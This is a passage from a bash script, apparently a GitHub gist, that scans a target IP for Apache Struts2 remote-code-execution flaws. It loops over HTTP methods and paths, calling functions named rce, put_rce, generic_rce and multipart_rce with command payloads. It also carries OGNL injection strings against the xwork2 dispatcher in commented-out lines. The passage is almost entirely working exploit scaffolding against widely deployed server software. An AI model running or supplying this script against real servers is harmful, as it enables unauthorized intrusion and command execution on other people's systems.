| # check "${METHOD} ${IPv4}${XPATH}" "$( multipart_rce "${METHOD}" "${IPv4}${XPATH}" "${dispatcher}" )" | |
| # done | |
| #done | |
| #dispatcher="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].setStatus(0)}.multipart/form-data" | |
| #for XPATH in ${PATH_LIST}; do | |
| # for METHOD in HEAD GET PUT POST DELETE TRACE OPTIONS NULL CONNECT; do | |
| # check "${METHOD} ${IPv4}${XPATH}" "$( generic_rce "${METHOD}" "${IPv4}${XPATH}" "${dispatcher}" )" | |
| # done | |
| #done | |
| # try put | |
| #check "${IPv4}/Hello.World" "$( put_rce "${IPv4}/Hello.World" "${OS_PAYLOAD}" )" | |
| #check "${IPv4}/Hello.World" "$( put_rce "${IPv4}/Hello.World" "${CMD_PAYLOAD}" )" | |
| # try GET | |
| #check "${IPv4}/" "$( rce "${IPv4}/" "${OS_PAYLOAD}" )" | |
| #check "${IPv4}/" "$( rce "${IPv4}/" "${CMD_PAYLOAD}" )" | |
| # try GET | |
| #for XPATH in ${PATH_LIST}; do | |
| # check "${IPv4}${XPATH}" "$( rce "${IPv4}${XPATH}" "${OS_PAYLOAD}" )" | |
| # check "${IPv4}${XPATH}" "$( rce "${IPv4}${XPATH}" "${CMD_PAYLOAD}" )" | |
| #done | |
| #dispatcher="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].setStatus(123)}.multipart/form-data" | |
| #dispatcher='%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("X-Frame-Options",255*255)}.multipart/form-data' | |
| # for METHOD in HEAD PUT GET POST DELETE TRACE OPTIONS NULL CONNECT; do | |
| for XPATH in /; do | |
| for METHOD in HEAD PUT GET; do | |
| #check "${METHOD} ${IPv4}${XPATH}" "$( generic_rce "${METHOD}" "${IPv4}${XPATH}" "${dispatcher}" )" | |
| #check "${METHOD} ${IPv4}${XPATH}" "$( generic_rce "${METHOD}" "${IPv4}${XPATH}" "${OS_PAYLOAD}" )" | |
| check "${METHOD} ${IPv4}${XPATH}" "$( generic_rce "${METHOD}" "${IPv4}${XPATH}" "${CMD_PAYLOAD}" )" | |
| done | |
| done | |
| exit 0 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment